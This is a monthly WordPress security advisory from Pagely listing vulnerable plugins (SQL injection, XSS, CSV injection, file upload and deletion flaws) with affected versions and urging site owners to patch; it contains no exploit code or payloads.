This monthly report is provided for the WordPress community at large from Pagely’s head of security, Robert Rowley. Rowley and the entire security team keep their finger on the pulse of any potential vulnerabilities that might affect our customers, as well as any WordPress user.
We sincerely hope these efforts help any and all that could use information from the experts on monthly security issues. We commend the researches and developers that help to identify and patch these issues in a timely fashion.
No notable WordPress core security releases.
Plugin/Theme Vulnerabilities of Note
Security & Malware scan by CleanTalk
This vulnerability within CleanTalk allows an authenticated user, such as an editor or subscriber, to make unauthorized Ajax calls which could lead to file deletion or downloads and also potentially function calls.
The Adning Advertising plugin has a vulnerability in versions lower than 1.5.6 which allows unauthenticated requests to upload or delete files, leading to an RCE attack, which can then lead to full site takeover.
Wise Chat versions lower than 2.8.4 are susceptible to a CSV injection via a command sent in chat messages by an unauthenticated user that is included in an exported CSV file, which then could potentially lead to an RCE attack.
Email Verification for WooCommerce
The Email Verification for Woocommerce plugin prior to version 1.8.2 is affected by a loose comparison issue. This could potentially lead to any user (authenticated or non-authenticated), to log into the WordPress site.
SRS Simple Hits Counter
The SRS Simple Hits counter plugin is currently vulnerable to an unauthenticated blind SQL injection vulnerability. The responsible reporting parties at Tenable ( https://www.tenable.com/security/research/tra-2020-42 ) are working with the developer to write a more comprehensive patch to address this vulnerability, and will not release more details on the attack until they know a patch has been released. Site owners using SRS Simple Hits Counter plugin on their sites should keep an eye out daily for the patch to be released.
Payment Form For Paypal Pro
The Payment Form for Paypal Pro plugin versions before 1.1.65 are vulnerable to an unauthenticated SQL injection attack. The attack is a trivial single request which can expose the contents of your database (which includes user passwords and potentially other secrets) to the attack. This is a high risk vulnerability and site owners should patch immediately.
The WooCommerce Subscription plugin is vulnerable to an unauthenticated stored cross site scripting (XSS) attack in the subscription billing process. Attackers can submit their XSS attack payload to during the billing step in the signup process, and later that payload will be executed on the browser of the administrator/user who reviews the attacker’s account. Site owners should update WooCommerce Subscriptions plugin to version 2.6.3 and not check any new user account information until that update is performed.
The JobSearch plugin versions before 1.5.6 are vulnerable to a reflected cross site scripting vulnerability. Much like the KingComposer vulnerability above it is a high risk if logged in users to be targeted. The proof of concept for this vulnerability will be released on August 6th, 2020, site owners should patch before this date.